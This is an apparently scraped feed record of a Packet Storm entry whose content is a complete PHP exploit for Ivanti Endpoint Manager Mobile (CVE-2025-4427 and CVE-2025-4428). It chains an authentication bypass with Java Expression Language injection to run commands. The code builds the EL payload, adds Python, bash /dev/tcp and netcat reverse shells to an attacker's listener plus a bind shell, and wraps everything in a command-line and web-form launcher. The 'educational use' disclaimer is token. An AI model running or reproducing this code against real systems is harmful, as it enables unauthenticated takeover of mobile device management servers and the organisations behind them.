{“lastseen”:”2025-12-17T16:36:38″,”description”:”Ivanti Endpoint Manager Mobile version 12.5.0.0 proof of concept exploit with a vulnerability chain that allows unauthenticated attackers to execute arbitrary commands on the target system through Java Expression Language EL injection in the…”,”published”:”2025-12-17T00:00:00″,”modified”:”2025-12-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212937″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-4427″,”CVE-2025-4428″],”sourceData”:”=============================================================================================================================================\\n | # Title : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.ivanti.com\/products\/endpoint-manager-mobile |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/200146\/ \\u0026 CVE-2025-4427, CVE-2025-4428 \\n \\n [+] Summary : \\n \\n The exploit targets two critical vulnerabilities in Ivanti EPMM:\\n CVE-2025-4427 – Authentication Bypass\\n CVE-2025-4428 – Expression Language Injection\\n The vulnerability chain allows unauthenticated attackers to execute arbitrary commands \\n \\t\\t\\t on the target system through Java Expression Language (EL) injection in the \/mifs\/rs\/api\/v2\/featureusage endpoint.\\n \\t\\t\\t \\n [+] Exploitation Mechanism\\n \\n Endpoint Discovery: The exploit targets \/mifs\/rs\/api\/v2\/featureusage\\n \\n Payload Injection: Uses Java EL injection via the format parameter\\n \\n Command Execution: Leverages Java runtime reflection to execute system commands\\n \\n Result Extraction: Uses Java Scanner class to read command output\\n [+] POC : \\n \\n php poc.php or http:\/\/127.0.0.1\/poc.php \\n \\n php poc.php -t target.com -c\\n \\n php poc.php -t 192.168.1.100 -P command\\n \\n php poc.php -t target.com -P reverse_shell -H YOUR_IP -L 4444\\n \\n \\u003c?php\\n \/*\\n * by indoushka\\n * CVE-2025-4427, CVE-2025-4428 – Ivanti EPMM RCE Exploit\\n *\/\\n \\n class IvantiEPMMExploit {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n \\n public function __construct($target, $port = 443, $ssl = true, $base_path = ‘\/’) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n }\\n \\n \/**\\n * Vulnerability check\\n *\/\\n public function check() {\\n echo \\”[*] Checking Ivanti EPMM vulnerability…\\\\n\\”;\\n \\n $command = ‘id’;\\n $response = $this-\\u003eexecute_command($command);\\n \\n if (!$response) {\\n echo \\”[-] Failed to get response from target\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n if (strpos($response, ‘uid=’) !== false \\u0026\\u0026 strpos($response, ‘gid=’) !== false) {\\n echo \\”[+] \u2713 Target is vulnerable!\\\\n\\”;\\n return \\”vulnerable\\”;\\n } else {\\n echo \\”[-] \u2717 Target is not vulnerable\\\\n\\”;\\n return \\”safe\\”;\\n }\\n }\\n \\n \/**\\n * Execute remote command\\n *\/\\n private function execute_command($command) {\\n \/\/ Build Expression Language Injection payload\\n $payload = $this-\\u003ebuild_el_payload($command);\\n \\n $url = $this-\\u003ebuild_url(‘\/mifs\/rs\/api\/v2\/featureusage’);\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url . ‘?format=’ . urlencode($payload),\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n echo \\”[*] HTTP Status: $http_code\\\\n\\”;\\n \\n return $response;\\n }\\n \\n \/**\\n * Build Expression Language Injection payload\\n *\/\\n private function build_el_payload($command) {\\n \/\/ Java Expression Language Injection for command execution\\n $payload = \\”\\\\${”.getClass().forName(‘java.util.Scanner’).getConstructor(”.getClass().forName(‘java.io.InputStream’)).newInstance(”.getClass().forName(‘java.lang.Runtime’).getMethod(‘getRuntime’).invoke(null).exec(‘{$command}’).getInputStream()).useDelimiter(‘\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\A’).next()}\\”;\\n \\n return $payload;\\n }\\n \\n \/**\\n * Main exploit execution\\n *\/\\n public function exploit($payload_type = ‘reverse_shell’, $lhost = null, $lport = null) {\\n echo \\”[*] Starting Ivanti EPMM exploitation…\\\\n\\”;\\n \\n \/\/ Create payload based on type\\n $payload_cmd = $this-\\u003egenerate_payload($payload_type, $lhost, $lport);\\n \\n if (!$payload_cmd) {\\n echo \\”[-] Failed to generate payload\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Executing payload…\\\\n\\”;\\n $response = $this-\\u003eexecute_command($payload_cmd);\\n \\n if ($response) {\\n echo \\”[+] \u2713 Payload sent successfully\\\\n\\”;\\n echo \\”[*] Check your reverse connection\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] \u2717 Failed to execute payload\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Generate different payloads\\n *\/\\n private function generate_payload($type, $lhost, $lport) {\\n switch ($type) {\\n case ‘reverse_shell’:\\n if (!$lhost || !$lport) {\\n echo \\”[-] IP and port required for reverse shell\\\\n\\”;\\n return false;\\n }\\n return $this-\\u003egenerate_reverse_shell($lhost, $lport);\\n \\n case ‘bind_shell’:\\n if (!$lport) {\\n echo \\”[-] Port required for bind shell\\\\n\\”;\\n return false;\\n }\\n return $this-\\u003egenerate_bind_shell($lport);\\n \\n case ‘command’:\\n return ‘id; whoami; uname -a; pwd’;\\n \\n default:\\n return ‘id; whoami’;\\n }\\n }\\n \\n \/**\\n * Generate reverse shell\\n *\/\\n private function generate_reverse_shell($lhost, $lport) {\\n \/\/ Multiple reverse shells\\n $shells = [\\n \/\/ Python reverse shell\\n \\”python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{$lhost}\\\\\\”,{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\\\\\\”\/bin\/bash\\\\\\”)’\\”,\\n \\n \/\/ Bash reverse shell\\n \\”bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261’\\”,\\n \\n \/\/ Netcat reverse shell\\n \\”rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2\\u003e\\u00261|nc {$lhost} {$lport} \\u003e\/tmp\/f\\”\\n ];\\n \\n return $shells[0]; \/\/ Use Python as default\\n }\\n \\n \/**\\n * Generate bind shell\\n *\/\\n private function generate_bind_shell($lport) {\\n return \\”python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\\\\\\”0.0.0.0\\\\\\”,{$lport}));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);import pty; pty.spawn(\\\\\\”\/bin\/bash\\\\\\”)’\\”;\\n }\\n \\n \/**\\n * Build full URL\\n *\/\\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n }\\n \\n \/\/ CLI Interface\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\\n \u2588\u2588\u2551\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\\n \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\\n \\n Ivanti EPMM RCE ExploitPHP Implementation\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:c:P:L:H:\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”check\\”,\\n \\”payload:\\”,\\n \\”lhost:\\”,\\n \\”lport:\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 443;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $payload_type = $options[‘P’] ?? $options[‘payload’] ?? ‘command’;\\n $lhost = $options[‘H’] ?? $options[‘lhost’] ?? null;\\n $lport = $options[‘L’] ?? $options[‘lport’] ?? 4444;\\n \\n if (!$target) {\\n echo \\”Usage: php poc.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 443)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: true)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -P, –payload Payload type: command, reverse_shell, bind_shell (default: command)\\\\n\\”;\\n echo \\” -H, –lhost Listener host for reverse shell\\\\n\\”;\\n echo \\” -L, –lport Listener port for reverse shell (default: 4444)\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php poc.php -t 192.168.1.100 -c\\\\n\\”;\\n echo \\” php poc.php -t target.com -P reverse_shell -H 10.0.0.5 -L 4444\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n if ($exploit-\\u003eexploit($payload_type, $lhost, $lport)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \/\/ Web Interface – FIXED VERSION\\n \/\/ Check if form was submitted\\n $action = $_POST[‘action’] ?? ”;\\n \\n if ($action === ‘check’ || $action === ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 443;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/’;\\n $payload_type = $_POST[‘payload_type’] ?? ‘command’;\\n $lhost = $_POST[‘lhost’] ?? ”;\\n $lport = $_POST[‘lport’] ?? 4444;\\n \\n if (empty($target)) {\\n echo \\”\\u003cdiv style=’color: red; padding: 10px; border: 1px solid red; margin: 10px;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n } else {\\n $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);\\n \\n ob_start();\\n if ($action === ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $exploit-\\u003eexploit($payload_type, $lhost, $lport);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre style=’background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;’\\u003e$output\\u003c\/pre\\u003e\\”;\\n }\\n \\n \/\/ Show the form again after execution\\n echo ‘\\u003ca href=\\”‘.htmlspecialchars($_SERVER[‘PHP_SELF’]).’\\” style=\\”display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;\\”\\u003eBack to Form\\u003c\/a\\u003e’;\\n } else {\\n \/\/ Display the form\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eIvanti EPMM RCE Exploit\\u003c\/title\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cstyle\\u003e\\n body { \\n font-family: Arial, sans-serif; \\n margin: 0; \\n padding: 20px; \\n background: #f5f5f5;\\n }\\n .container { \\n max-width: 800px; \\n margin: 0 auto; \\n background: white;\\n padding: 30px;\\n border-radius: 8px;\\n box-shadow: 0 2px 10px rgba(0,0,0,0.1);\\n }\\n h1 { \\n color: #333; \\n border-bottom: 2px solid #007cba;\\n padding-bottom: 10px;\\n }\\n h3 {\\n color: #666;\\n }\\n .form-group { \\n margin-bottom: 20px; \\n }\\n label { \\n display: block; \\n margin-bottom: 8px; \\n font-weight: bold;\\n color: #333;\\n }\\n input[type=\\”text\\”], select { \\n width: 100%; \\n padding: 10px; \\n border: 1px solid #ddd; \\n border-radius: 4px; \\n box-sizing: border-box;\\n font-size: 14px;\\n }\\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n button { \\n background: #007cba; \\n color: white; \\n padding: 12px 25px; \\n border: none; \\n border-radius: 4px; \\n cursor: pointer; \\n margin-right: 10px;\\n font-size: 16px;\\n transition: background 0.3s;\\n }\\n button:hover {\\n background: #005a87;\\n }\\n .danger { \\n background: #dc3545; \\n }\\n .danger:hover {\\n background: #c82333;\\n }\\n .info { \\n background: #17a2b8; \\n }\\n .info:hover {\\n background: #138496;\\n }\\n .warning-box {\\n background: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n .info-box {\\n background: #d1ecf1;\\n border: 1px solid #bee5eb;\\n color: #0c5460;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eIvanti EPMM RCE Exploit\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2025-4427 \\u0026 CVE-2025-4428 – Authentication Bypass \\u0026 RCE\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”warning-box\\”\\u003e\\n \\u003cstrong\\u003e\u26a0\ufe0f Warning:\\u003c\/strong\\u003e This tool is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”192.168.1.100 or target.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”443\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”ssl\\” name=\\”ssl\\” checked\\u003e\\n \\u003clabel for=\\”ssl\\” style=\\”display: inline; font-weight: normal;\\”\\u003eUse SSL\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”payload_type\\”\\u003ePayload Type:\\u003c\/label\\u003e\\n \\u003cselect id=\\”payload_type\\” name=\\”payload_type\\”\\u003e\\n \\u003coption value=\\”command\\”\\u003eTest Command (id; whoami)\\u003c\/option\\u003e\\n \\u003coption value=\\”reverse_shell\\”\\u003eReverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”bind_shell\\”\\u003eBind Shell\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lhost\\”\\u003eListener Host (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lhost\\” name=\\”lhost\\” placeholder=\\”Your IP address: 192.168.1.100\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lport\\”\\u003eListener Port (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lport\\” name=\\”lport\\” value=\\”4444\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout CVE-2025-4427 \\u0026 CVE-2025-4428:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eVulnerability:\\u003c\/strong\\u003e Authentication Bypass + Expression Language Injection\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected Products:\\u003c\/strong\\u003e Ivanti EPMM, MobileIron Core\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Unauthenticated Remote Code Execution\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eEndpoint:\\u003c\/strong\\u003e \/mifs\/rs\/api\/v2\/featureusage\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCVSS Score:\\u003c\/strong\\u003e 9.8 (Critical)\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212937″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212937\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-17T16:36:38″,”description”:”Ivanti Endpoint Manager Mobile version 12.5.0.0 proof of concept exploit with a vulnerability chain that allows unauthenticated attackers to execute arbitrary commands on the target…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-31575","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n